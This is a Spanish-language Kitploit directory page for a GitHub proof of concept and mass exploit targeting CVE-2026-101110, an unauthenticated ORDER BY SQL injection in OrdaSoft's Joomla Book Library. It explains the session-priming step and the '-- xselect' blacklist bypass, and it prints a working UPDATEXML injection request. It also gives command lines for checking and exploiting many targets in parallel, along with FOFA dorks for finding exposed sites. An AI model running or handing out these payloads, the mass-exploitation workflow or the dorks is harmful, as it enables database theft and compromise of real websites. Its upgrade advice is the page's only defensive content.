Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-101110 — PoC en Python 3 y exploit masivo para CVE-2026-101110, una inyección SQL ORDER BY no autenticada en OrdaSoft Joomla Book Library <=6.4.6 a través de los parámetros field/direction. | Kitploit
Herramientas/GitHubGitHub/murrez/cve-2026-101110
ReconocimientoEscáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónScripting y AutomatizaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubmurrez/cve-2026-101110

CVE-2026-101110

hace 4 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

PoC en Python 3 y exploit masivo para CVE-2026-101110, una inyección SQL ORDER BY no autenticada en OrdaSoft Joomla Book Library <=6.4.6 a través de los parámetros field/direction.

Ver Repositorio
Compartir

CVE-2026-101110 — OrdaSoft Book Library (Free) inyección SQL no autenticada

PoC en Python 3 para CVE-2026-101110 — OrdaSoft Book Library (Free) para Joomla ≤ 6.4.6. Actualice a 6.4.7+.

PoCbithttps://pocbit.org/pocs/cve-2026-101110
Catálogohttps://pocbit.org/pocs/
Componentecom_booklibrary
Archivo / funciónsite/booklibrary.php → books()
Parámetrosfield, direction (ordenación)
AutenticaciónNinguna (listados públicos de libros)
CWECWE-89 Inyección SQL
CVSS 4.09.3 Crítica (Joomla CNA)
CréditoAla Arfaoui

Resumen de la vulnerabilidad (Türkçe)

Book Library (Free) es una extensión de OrdaSoft que ofrece bibliotecas de libros / listados de categorías en Joomla. En las versiones 6.4.6 y anteriores, la función books() filtra los parámetros field y direction con protectInjectionWithoutQuote(). Esta función solo aplica una lista negra débil que busca la subcadena select; al encontrarla, envuelve el valor con $db->quote(), pero no lo rechaza.

Los valores se añaden después a una expresión ORDER BY sin comillas — usar comillas aquí no detiene la inyección SQL (descripción del CNA).

Dos condiciones para la explotación:

  1. Preparación de sesión: La primera petición escribe los valores de ordenación predeterminados (field / direction) almacenados en la sesión.
  2. Bypass de lista negra: En la segunda petición, se añade el comentario señuelo -- xselect al final de la carga útil; pasa la comprobación de la lista negra y el comentario SQL no afecta al resto de la carga útil.

Resultado: SQLi en ORDER BY sin autenticación, con riesgo crítico para la lectura/escritura de la base de datos y la integridad del sitio.


Mecanismo técnico

Request 1 (prime):  ...&field=title&direction=ASC   → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
                      └─ concatenated into ORDER BY (unquoted)

Filtro débil (conceptual):

  • La entrada contiene select (subcadena) → envuelve todo el valor entre comillas (irrelevante en el contexto de ORDER BY).
  • El atacante añade -- xselect para que la lista negra vea select dentro de la cola del comentario, mientras que la expresión activa antes de -- sigue siendo SQL ejecutable (técnicas de error-based / UPDATEXML / ORDER BY apilado).

El PoC implementa:

PasoAcción
FingerprintRutas de com_booklibrary + versión opcional del manifiesto
Descubrimiento de rutasshowCategory, search, showBooks, books, … + catid / Itemid extraídos
checkPreparar sesión → confirmar SQLi (flag / VERSION())
exploitPreparar → extracción con --subquery (por defecto SELECT VERSION())
mass--list + objetivos paralelos con -j; exploited.txt al filtrar con éxito

Constante del sufijo de carga útil en el código: -- xselect (BLACKLIST_DECOY).


Requisitos

cd CVE-2026-101110
pip install -r requirements.txt

Uso

Objetivo único

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"

Masivo (flujo de trabajo exploit-first)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagSignificado
--aggressiveEl modo check intenta filtrar la versión tras la preparación
--subqueryExpresión interna para cargas útiles UPDATEXML / doble consulta
--exploited-listExtracciones exitosas separadas por tabulaciones
--no-colorDesactiva ANSI (también NO_COLOR)

JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component, session_primed.


Ejemplo HTTP

Preparación (sesión):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC HTTP/1.1

Inyección (el PoC añade el señuelo):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC HTTP/1.1

Se intentan variantes POST en la misma ruta cuando GET falla.


Detección de versión

Manifiesto (si está expuesto):

  • /administrator/components/com_booklibrary/booklibrary.xml

≤ 6.4.6 → línea vulnerable; ≥ 6.4.7 → parcheada (patched_version en la salida de check).


Dorks de FOFA

body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"

CVEs relacionadas de OrdaSoft (sep 2026)

CVEExtensiónProblemaCorregido
CVE-2026-101110Book LibrarySQLi en ORDER BY + bypass de lista negra6.4.7
CVE-2026-101111Book LibraryXSS reflejado (parámetro title)6.4.7
CVE-2026-101108Vehicle ManagerSQLi en ORDER BY6.5.8
CVE-2026-100752Real Estate ManagerSQLi en ORDER BY6.7.9

Parchee todos los componentes de OrdaSoft que despliegue.


Referencias

  • PoCbit CVE-2026-101110
  • CVE.report CVE-2026-101110
  • OrdaSoft
  • Histórico: SQLi más antiguo en com_booklibrary en tareas de búsqueda/préstamo (CVE-2010-1522) — rutas de código diferentes

Legal

Solo pruebas autorizadas y validación de parches.


Descripción del repositorio de GitHub

CVE-2026-101110 PoC: OrdaSoft Joomla Book Library (Free) <=6.4.6 unauth SQLi — field/direction ORDER BY, session prime + `-- xselect` blacklist bypass (com_booklibrary). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101110
Descargar herramienta